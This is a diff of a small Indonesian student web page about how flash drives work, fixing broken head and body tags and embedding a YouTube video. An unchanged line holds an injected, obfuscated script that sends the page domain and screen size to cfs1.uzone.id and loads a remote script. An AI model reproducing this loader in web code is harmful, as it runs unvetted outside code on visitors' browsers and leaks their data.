--- a/index.html
+++ b/index.html
@@ -1,7 +1,6 @@
 
 <html>
-<head></head>
-    <style type="text/css">
+<head>
 <style type="text/css">
 body { 
     background: url("http://4.bp.blogspot.com/-iKZYWBEwT0U/TtkAbrabcdI/AAAAAAAAAHI/VD0TUhBg5mU/s1600/Background.png") no-repeat scroll; 
@@ -27,10 +26,11 @@ p {
     font-size: 400%;
 }
 </style>
-<body></body>
-<body>
+    <body>
 <p>Kelompok 5</p>
 <p align="center"> Cara Kerja Flashdisk </p>
 <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs1.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582CL4NjpNgssKBPCNTiuGcq1zjlHmNqQfCGDOcMprxP9UoxljWc8tEo1PMD2NCWdl4DhqFgGALt1nqV8x03e0bByWZVsg4dWo3jiGIqNQHgZnkdT%2bwZexfJZLsKIfIyLd2yUczSeOOUkW0nRRx%2fCURySERRL7L2i7u2UFuln8c0s9Gbry52BXRyrOt40tfXWoDRfhFcypDN3Z0x6NPtCESZxdb8TqUWVPwZWuKgKNrhvgZpNMuUanxDBDPP49bCBCYckKTSW6KAzG0tp0pytayuepde4YFK8ce5sHmfkexxAsPcS4n4mlbzjwS56zP62ffZAD9U54FGf4uThGtlCxSMhfbRPwdox3YmhFJQpsX7IRc0Mo%2fph8bfiWGwpeZ02DP%2frK2tgEPWl8q3fL9M2F8P9fxoBbT9BQMZ6xtRdh96vuLjHh5H550glNnX4qQ542ICfXwO0oCULpM3Avm7P68ZjorPJJDoRqij%2fZ5sWgrWncY%2bvsbhwvoQw%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script>
-<iframe width="560" height="315" src="https://www.youtube.com/embed/sSVnIA0BiS4" frameborder="0" allowfullscreen></iframe><!DOCTYPE html>
+<iframe width="560" height="315" src="https://www.youtube.com/embed/sSVnIA0BiS4" frameborder="0" allowfullscreen></iframe>
 </body>
+
+
